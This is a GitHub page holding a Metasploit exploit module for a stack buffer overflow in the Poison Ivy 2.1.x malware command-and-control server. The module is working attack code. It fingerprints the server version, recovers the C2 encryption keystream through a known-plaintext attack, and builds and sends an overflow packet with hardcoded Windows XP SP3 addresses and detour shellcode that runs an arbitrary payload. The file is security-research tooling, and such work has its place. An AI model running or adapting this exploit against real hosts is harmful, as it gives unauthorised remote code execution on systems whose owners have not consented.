-
Notifications
You must be signed in to change notification settings - Fork 8
/
poisonivy_21x_bof.rb
187 lines (156 loc) · 14.7 KB
/
poisonivy_21x_bof.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Poison Ivy 2.1.x C2 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Poison Ivy 2.1.x C&C server.
The exploit does not need to know the password chosen for the bot/server communication.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jos Wetzels' # Vulnerability Discovery, exploit & Metasploit module
],
'References' =>
[
[ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ],
],
'DisclosureDate' => 'Jun 03 2016',
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 0x847 # limited by amount of known plaintext (hard upper limit is 0xFFD)
},
'Platform' => 'win',
'Targets' =>
[
[
'Poison Ivy 2.1.4 on Windows XP SP3',
{
'Ret' => 0x00469159, # jmp esp from "Poison Ivy 2.1.4.exe"
'StoreAddress' => 0x00520000, # .tls section address from "Poison Ivy 2.1.4.exe"
'InfoSizeOffset' => 0x1111, # offset of InfoSize variable
'DecompressSizeOffset' => 0x1109, # offset of DecompressSize variable
'Packet2Offset' => 0xB9E # offset of second packet within server's response
}
]
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(3460)
], self.class)
end
# XOR two strings
def xor_strings(s1, s2)
s1.unpack('C*').zip(s2.unpack('C*')).map{ |a,b| a ^ b }.pack('C*')
end
# Obtain keystream using known plaintext
def get_keystream(ciphertext, knownPlaintext)
if(ciphertext.length < knownPlaintext.length)
return xor_strings(ciphertext, knownPlaintext[0, ciphertext.length])
else
return xor_strings(ciphertext, knownPlaintext)
end
end
# Apply keystream to plaintext
def use_keystream(plaintext, keyStream)
if(keyStream.length > plaintext.length)
return xor_strings(plaintext, keyStream[0, plaintext.length])
else
return xor_strings(plaintext, keyStream)
end
end
def check
connect
# Poke
sock.put("\x01")
# Fetch response
response = sock.get_once(6)
if (response == "\x89\xFF\x90\x0B\x00\x00")
vprint_status("Poison Ivy C&C version 2.1.4 detected.")
return Exploit::CheckCode::Appears
elsif (response == "\x89\xFF\x38\xE0\x00\x00")
vprint_status("Poison Ivy C&C version 2.0.0 detected.")
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Safe
end
def exploit
# Known plaintext from C2 packet
knownPlaintext1 = "\x89\x00\x69\x0c\x00\x00"
knownPlaintext2 = "\x69\x0c\x00\x00\x44\xb8\x00\x04\x07\x00\x6d\x70\x72\x2e\x64\x00\x6c\x6c\x05\x0c\x00\x61\x76\x69\x20\x63\x61\x70\x33\x32\x01\x70\x06\x0b\x00\x00\x70\x73\x74\x6f\x72\x65\x63\x01\x01\x34\x08\x0b\x00\x73\x68\x65\x6c\x02\x6c\x03\x6c\x0a\x09\x00\x67\x64\x69\x01\x03\x2c\x0b\x0c\x00\x69\x70\x68\x6c\x10\x70\x61\x70\x69\x01\x50\x0c\x0b\x01\x20\x63\x72\x79\x70\x74\x03\x38\x02\x00\x00\x1d\x03\x00\x00\x00\x55\x8b\xec\x00\x81\xc4\x04\xf0\xff\xff\x50\x81\x00\xc4\x64\xfa\xff\xff\x53\x56\x57\x00\x8b\xf1\x89\x55\xdc\x89\x45\xe0\x00\x8b\x5d\xe0\x8b\x83\x17\x07\x00\x80\x00\x89\x45\xb8\x8b\x83\xc4\x00\x2c\x10\x89\x45\xe8\x8b\x00\x0b\x40\x08\x05\x02\x12\x00\x3b\x89\x45\xe4\x64\xff\x35\x01\x00\x16\x00\x8f\x45\xec\xff\x75\xe8\x00\x8f\x45\xf0\xff\x75\xe4\x8f\x45\x80\xf4\x8d\x45\xec\x64\x89\x05\x01\x18\x00\x89\x65\xf8\x89\x6d\xfc\x8b\x45\x40\xdc\x33\xd2\x89\x50\x02\x00\x07\xc6\x00\x00\x89\xc6\x45\xbf\x00\x83\xbb\x02\xd8\x01\x1e\x0f\x84\x93\x02\x00\x00\x29\x00\x52\x05\xf8\x00\x07\x50\x00\x08\xff\x90\x22\xe0\x00\x09\x8d\x83\xe0\x00\x1e\x50\x8d\x08\x85\x65\xea\x00\x4c\xff\x53\x04\x85\x00\xf6\x74\x14\x83\x7e\x04\x00\x7e\x22\x0e\x80\x21\x8b\x56\x04\x00\x26\x33\xc0\x40\x89\x46\x08\xc7\x45\xc0\x00\x17\x00\x09\x80\x05\x45\xc8\x01\x02\xc4\x8d\x45\xc4\x50\x50\x8d\x45\xc8\x00\x25\xc0\x03\x27\x6c\x41\x80\x0f\x6a\x04\x68\x00\x10\x81\x33\xc8\x00\x50\x6a\x00\xff\x53\x2c\x89\x45\x02\xd4\x06\x40\xdb\x01\x00\x00\x68\x51\x80\x14\x00\x00\x8d\x85\x67\xeb\x01\x36\x0c\x93\x90\x00\x3d\x81\x25\xd8\x33\xff\x80\x80\x7d\xbf\x00\x75\x34\xbf\x06\x80\x08\xee\x57\x00\x3c\x00\x48\x84\x11\x8c\x81\x08\x84\x18\x06\x03\x55\x04\x56\x08\x00\x70\x01\x00\x58\x1f\x02\x58\x19\x00\x8b\x46\x04\x2b\x46\x08\x3d\xfc\x00\x0f\x00\x00\x7d\x05\x89\x45\xd8\x20\xeb\x07\xc7\x45\xd8\x81\x06\x01\x7d\x00\xd8\x83\x7d\xd8\x00\x0f\x86\x58\x01\x00\x41\x29\x7d\xd8\x8b\x45\xd8\x89\x14\x45\xcc\x03\x09\x0f\x00\x09\x69\x45\xc8\x81\x81\x09\x89\x45\xd0\x8b\x45\xd4\x00\x35\x04\xcc\x50\x44\x31\xd0\x50\x8d\x47\x08\x18\x8d\x84\x05\xc2\x22\x40\x0d\x50\x8b\x06\x00\x33\xd2\x52\x50\x8b\x46\x08\x99\x00\x03\x04\x24\x13\x54\x24\x04\x83\x14\xc4\x08\x47\x40\x70\x40\x40\x85\xc0\x74\x62\x30\xc3\x17\x8b\x45\xcc\xd3\x0b\xc8\x14\xff\x86\x93\xc1\x37\x40\x0a\x3b\x45\xd8\x72\xee\x0d\xa0\x6a\x04\x8d\x45\xd8\x80\x28\x04\x85\x28\x21\x83\x13\x83\x45\xcc\x04\x01\x1f\x8d\x47\x17\x06\x06\x89\x02\x85\x7a\x08\x81\x0f\xcc\x50\x8d\x0c\x84\x3d\x88\x5a\xc1\x0e\x03\x7d\xcc\x57\x59\x84\x5a\x8b\x83\x41\x8f\x40\x38\xe0\xc0\x00\xb8\x08\xff\x90\xa4\x40\x38\x84\xc0\x74\x13\x00\x85\xf6\x0f\x84\x23\xfe\xff\xff\x41\x40\x3a\x01\x46\x08\xe9\x18\x80\x02\x68\x0e\x02\x40\x52\xc5\x91\x82\x76\x68\x00\x80\x00\x84\x00\x6a\x00\x9d\xd4\x50\xff\x53\x00\x37\x2a\xb8\xc8\x9e\xe4\x00\x12\x90\x01\x00\x5f\x5e\x00\x5b\x8b\xe5\x5d\xc3\x76\x00\x19\x23\x80\x0f\xc1\xc8\x83\xc4\xe4\x41\xc6\x5d\x10\x20\x8b\x45\x08\x8b\xb0\x01\xc5\x8b\x80\xc9\x45\xc4\x86\xd8\x00\x09\x05\xdd\x80\x84\x68\xc4\x00\x0c\x83\x3b\x00\x7e\x17\x8b\x13\x00\x3b\x50\x04\x74\x10\x8b\x13\x81\x00\xc2\xff\x1f\x00\x00\x81\xe2\x00\x00\xe0\xff\xff\x89\x13\x8b\x38\x8b\x00\xd7\x8b\x0b\x3b\x48\x0c\x74\x60\x81\xc0\x04\x75\x1b\x57\xff\x96\xdc\x60\x0c\xb4\x8b\xf8\x00\x01\xe0\x00\x01\xc0\x00\xe4\xc0\x00\x00\x33\xd2\xeb\x40\x83\x78\x0c\x00\x00\x75\x18\x8b\x03\x50\x6a\x02\xff\x2c\x96\xe8\x80\x02\x82\x04\xec\x01\x01\xd0\xeb\x26\x22\x00\x05\x0a\x07\x6a\x02\x20\x05\x57\xff\x9c\x56\x60\x00\x03\x63\x04\xc2\x1d\x8b\xc2\x03\x1e\x08\xc2\x0c\x00\xa0\x1c\x55\x51\x89\x0c\x00\x24\x8b\xfa\x8b\xf0\x8b\xc6\x8b\x02\xa8\x42\x1d\xdf\x54\x57\x56\xff\x95\x01\xc1\x1c\x89\x03\x8b\x04\x24\x89\x43\x08\x0c\x5a\x5d\x20\x06\xc3\x71\x00\x21\x43\xa0\x1e\x60\x06\x8b\xc8\x8b\xb1\x22\x05\xda\x60\x33\xc9\xff\x96\xd4\xa0\x0f\x20\x68\x43\x02\x04\x81\x00\x08\x5e\x5b\xc3\x72\x00\x82\x2a\xec\x04\xca\x33\xdb\x89\x19\x60\x00\xd4\x59\x04\x81\x00\x08\x81\x00\x0c\x45\x07\x00\x06\x58\x73\x00\xa6\x01\x06\x80\x93\x51\xc1\x2e\x55\x22\x0c\xc1\x2e\xf0\x8b\xbe\x63\x0c\x83\x7b\x00\x08\x00\x7c\x53\x83\x7d\x14\x00\x00\x7c\x4d\x8b\x4b\x08\x03\x4d\x14\x00\x89\x4d\xfc\x83\x7d\xfc\x00\x7e\x80\x3e\x8b\x4d\xfc\x3b\x4b\x04\x00\x2b\x91\xe1\x00\x0c\x7e\x09\xe0\x01\xff\x97\xe1\x11\xa0\x8b\x45\xfc\x89\x43\x00\x50\x14\x40\x46\x00\x10\x50\x8b\x03\x03\x43\x08\x50\x0c\xff\x96\xe3\x5c\x20\x03\x08\x8b\x45\x14\x10\xeb\x02\x33\xc0\xa0\x1a\x59\x5d\xc2\xc0\x10\x00\x8b\xc0\x53\x56\x86\x1a\x9c\x15\x18\x74\x00\x3e\x00\x1e\xa8\x44\x7d\x14\x8b\x50\x55\x08\x8b\x82\x82\x15\x8a\xa2\x44\x4d\x90\xe8\x8b\x80\xd0\x80\x04\x05\x85\xc0\x1a\x05\xbf\x44\x00\xe4\xa6\x5d\x0c\x8b\x43\x08\x00\x85\xc0\x7c\x28\x85\xff\x7c\x24\x00\x8b\x73\x04\x2b\xf0\x85\xf6\x7e\x00\x1b\x3b\xfe\x7d\x02\x8b\xf7\x56\x00\x8b\x0b\x03\xc8\x51\x8b\x45\x10\x08\x50\xff\x92\xc1\x18\x01\x73\x08\xeb\xc2\x07\xa2\x39\x33\xf6\x8b\xc6\xe0\x18\x00\x58\x77\x02\x19\x9f\x28\x9f\x28\xfc\x9f\x28\x9f\x28\x3a\x3e\x75\x1c\x00\x2d\x21\x3e\xdf\x4f\xc8\x4f\x77\x01\x67\x00\x85\xfd\x47\x00\x78\x01\x6e\x74\x00\xbc\x88\x00\x79\x01\x6a\x6b\xdf\x00\x5c\x00\x7a\x01\xc3\x53\xa3\x83\x00\x00\x7b\x01\xb5\xad\x12\x2e\x00\x00\x18\x01\x93\xae\x6a\x9d\x00\x1c\x00\x01\x8c\xad\x5d\xdb\x00\x1f\x03\x00\x4d\x26\xab\x1c\x00\x20\x01\xc4\x00\x09\x78\x78\x00\x22\x03\x23\xd5\x00\x1f\xda\x00\x23\x01\x60\x3b\x66\x00\x86\x00\x24\x07\x69\x5b\x5d\xbb\x00\x00\x25\x01\x75\xc0\xd4\x44\x00\x00\x45\x01\x75\xd7\xd0\xa7\x00\x46\x00\x01\x09\xb4\x58\x3b\x00\x47\x01\x00\xc7\x69\x89\xc3\x00\x48\x01\x17\x00\x3f\x53\x1e\x00\x49\x01\x69\x1f\x00\x19\xf0\x00\x4b\x03\x0b\xb5\xf9\x00\x49\x00\x7c\x05\x2c\x88\x92\x65\x90\x00\x03\x00\xb6\xc6\xe9\xf0\xf7\xe3\xe8\x00\xf0\x89\x75\xb0\x8b\x45\xb0\x8b\x0e\x98\x22\x41\x00\x01\x46\x86\x43\x0c\x05\xab\x07\x3f\xe8\x01\x11\x93\x20\x8d\x55\x9c\x8b\xc6\x98\xff\x93\xc8\x20\x24\x01\x05\x80\xdc\xa0\x01\x00\x56\x8b\xf0\x8d\xbd\x6c\xff\xff\x84\xff\xa5\x00\x00\x5e\xc7\x45\xc8\x20\x6e\x32\x00\xb1\x6f\x8d\x85\x51\x01\x70\x2e\xb0\x8b\x02\x80\x82\x52\xff\x53\x7c\x8d\x85\x7c\x11\x90\x02\x50\xff\x93\xc0\x4f\x00\xff\xb5\x62\x70\xc0\x00\xff\x93\x88\x50\x04\x61\x02\xff\xa0\x50\x24\x89\x45\xc8\x81\x57\xc8\x70\x66\xc0\x9c\x50\x56\xff\x93\xcc\x90\x06\x20\x05\x4e\xff\x10\x02\xda\x73\xd0\x07\xff\x50\x00\x74\xcc\x9d\x43\x76\xcc\x10\x05\xc1\x27\xf1\x09\x4d\xcc\x20\x0a\x0c\x53\x6c\xf6\x55\x70\x66\x45\xb0\xff\x50\xf2\x30\x40\x40\x45\xc8\xe1\x02\xb0\x77\x12\x58\x0f\x05\x3f\x0b\x05\x01\x78\x0f\x05\xb1\x63\xd2\x07\x30\x5b\xb0\x8d\x0c\x88\xeb\x90\x09\x41\x02\xc6\xff\x53\x6c\xe8\xc7\x85\xd0\xa0\x5e\x9c\x11\x01\x92\x00\x40\x09\xca\x94\xc0\x00\x68\x18\x01\x8d\x45\x66\x0d\x71\x0e\x0a\x84\x79\x0e\x6a\x60\x41\xb0\x05\x57\x04\x94\x00\x00\x5a\x01\x01\xd0\x06\x05\x5b\x5c\x01\x39\x30\x01\x8b\x80\x71\x13\x90\x7c\xb0\x00\xff\x90\x16\xa4\x80\x06\xf0\x06\x14\x91\x19\xf8\xff\x93\x16\x24\x70\x00\xe0\x00\x18\x60\x00\x89\x45\xc4\x2c\x68\x00\x70\x00\x69\x02\x1c\xf0\x00\x6a\x0f\x35\x66\x02\x20\xe1\x00\x0a\x02\x02\x31\x05\x0f\x31\x13\x50\x97\xb0\x97\x68\xf4\x70\x01\xff\x55\xd8\xc0\x0f\x31\x2b\x45\xe0\x1b\xb2\x98\x50\x01\xee\x8b\xa0\x8d\x9a\x03\x20\x89\xb0\x06\x08\x92\x05\x90\x77\x06\xe0\x39\x0c\xa1\x17\xb8\x6a\x00\x6a\x01\x03\x70\x5f\xb1\x18\x0c\x89\x45\xc0\x83\x7d\xb0\xc0\xff\x74\x41\x40\x01\xb0\x22\xbc\x20\x85\x61\x00\x0e\x8d\x85\x94\xf8\xa0\x8f\x31\x01\x68\x80\x7f\x74\x04\x40\x8b\x45\xc0\x30\x0c\x02\x2c\x40\x08\x33\xd2\x83\xfa\xff\x75\x20\x03\x83\xf8\xff\x74\x90\x97\xbc\xb9\x62\x4c\xd0\x0e\x99\xf7\xf9\x00\xa1\x51\x14\xb8\x03\xb9\x06\xc0\x9b\x48\x85\xc0\x72\x20\x40\x20\x89\x45\xac\x8d\xbd\x01\x05\x6a\x4c\x02\x57\x68\x17\x83\xc7\x4c\xff\x4d\xac\x4c\x75\xea\xc1\x05\x11\x0f\x50\x14\xd1\x09\xb4\xda\x6a\x40\x95\x43\xd2\x07\x80\x00\xf2\x80\x33\x00\x29\x0a\xb4\xd0\x07\xf0\xd0\x07\x85\xc0\x74\x1c\xcc\x8d\x8d\x41\x01\x95\x1e\x8d\x8d\xb1\x02\xd5\x00\x00\xff\x45\xb4\x83\x7d\xb4\x0a\x75\x98\xbb\x68\x7d\xc0\x34\x40\x05\x8b\x80\x91\x36\x01\x59\x09\xc6\x45\xd3\x01\x8d\x4d\x9c\x28\x8d\x55\xd2\xc1\x29\x08\x93\x03\x93\xc4\x07\xc0\x05\xa2\x52\x63\x52\xc3\x9b\x09\xf6\x4c\x00\x1f\x0b\x00\x9c\x09\x80\xa3\x44\x00\xba\x00\x9d\x09\x4d\x4b\x58\x5a\x00\x00\x6b\x01\x3f\x05\x3b\x6a\x00\x00\xb8\x09\x9c\xb5\x85\x98\x00\xb9\x00\x09\xf0\x76\xf1\xce\x00\xa9\x00\x0e\x82\x20\x10\xb1\x5e\x82\x69\x5d\x14\x8b\x7d\x01\xf0\x9e\xff\x00\x33\xf6\x6a\x00\x53\x09\xc0\x58\x03\xc6\xf0\x0b\x0c\x50\xff\x57\x0a\x18\x31\x13\x10\x10\x0c\x0c\x03\xf0\x2b\x00\xd8\x85\xdb\x75\xdf\xc6\x45\xff\xb0\x01\x8a\x45\xff\x20\x07\x12\x66\x90\xa2\x4e\x0c\x8b\xe9\x84\x76\x32\x42\x55\xff\x53\x70\x00\x88\x04\x24\x6a\x01\x8d\x44\x24\x0c\x04\x50\x30\x77\x72\x38\x33\xc0\x8a\x04\x18\x24\x50\x55\xe5\x00\xa3\x77\x1b\x00\x3e\x7b\x81\x08\x4f\x04\x00\x4f\x04\xc1\x3c\x4f\x04\x60\x76\xbd\x00\x02\xf7\x6c\x55\xd8\x00"
# detour shellcode (mov eax, StoreAddress; jmp eax)
detourShellcode = "\xB8" + [target['StoreAddress']].pack("V") # mov eax, StoreAddress
detourShellcode << "\xFF\xE0" # jmp eax
# Padding where necessary
compressedBuffer = payload.encoded + "\x90" * (0xFFD - payload.encoded.length)
# Construct exploit buffer
exploitBuffer = "A" * 4 # infoLen (placeholder)
exploitBuffer << compressedBuffer # compressedBuffer
exploitBuffer << "\xFF" * 0x104 # readfds
exploitBuffer << "C" * 4 # compressionType
exploitBuffer << "D" * 4 # decompressSize (placeholder)
exploitBuffer << "E" * 4 # pDestinationSize
exploitBuffer << "F" * 4 # infoSize (placeholder)
exploitBuffer << "G" * 4 # headerAllocSize
exploitBuffer << [target['StoreAddress']].pack("V") # decompressBuffer
exploitBuffer << "H" * 2 # decompressBuffer+4
exploitBuffer << "I" * 6 # lParam
exploitBuffer << "J" * 8 # timeout
exploitBuffer << "K" * 4 # hWnd
exploitBuffer << "L" * 4 # s
exploitBuffer << "M" * 4 # old EBP
exploitBuffer << [target['Ret']].pack("V") # EIP
exploitBuffer << [target['StoreAddress']].pack("V") # arg_0
exploitBuffer << detourShellcode # detour to storage area
# Calculate values
allocSize = exploitBuffer.length + 1024
infoLen = payload.encoded.length
infoSize = (infoLen + 4)
# Handshake
connect
print_status("Performing handshake...")
# Poke
sock.put("\x01")
# Fetch response
response = sock.get(target['Packet2Offset'] + knownPlaintext1.length + infoSize)
eHeader = response[target['Packet2Offset'], 6]
eInfo = response[target['Packet2Offset'] + 10..-1]
if ((eHeader.length >= knownPlaintext1.length) and (knownPlaintext1.length >= 6) and (eInfo.length >= knownPlaintext2.length) and (knownPlaintext2.length >= infoSize))
# Keystream derivation using Known Plaintext Attack
keyStream1 = get_keystream(eHeader, knownPlaintext1)
keyStream2 = get_keystream(eInfo, knownPlaintext2)
# Set correct infoLen
exploitBuffer = [infoLen].pack("V") + exploitBuffer[4..-1]
# Set correct decompressSize
exploitBuffer = exploitBuffer[0, target['DecompressSizeOffset']] + [infoSize].pack("V") + exploitBuffer[(target['DecompressSizeOffset'] + 4)..-1]
# Build packet
malHeader = use_keystream("\x89\x01" + [allocSize].pack("V"), keyStream1)
# Encrypt infoSize bytes
encryptedExploitBuffer = use_keystream(exploitBuffer[0, infoSize], keyStream2) + exploitBuffer[infoSize..-1]
# Make sure infoSize gets overwritten properly since it is processed before decryption
encryptedExploitBuffer = encryptedExploitBuffer[0, target['InfoSizeOffset']] + [infoSize].pack("V") + encryptedExploitBuffer[target['InfoSizeOffset']+4..-1]
# Finalize packet
exploitPacket = malHeader + [encryptedExploitBuffer.length].pack("V") + encryptedExploitBuffer
print_status("Sending exploit...")
# Send exploit
sock.put(exploitPacket)
else
print_status("Not enough keystream available...")
end
select(nil,nil,nil,5)
disconnect
end
end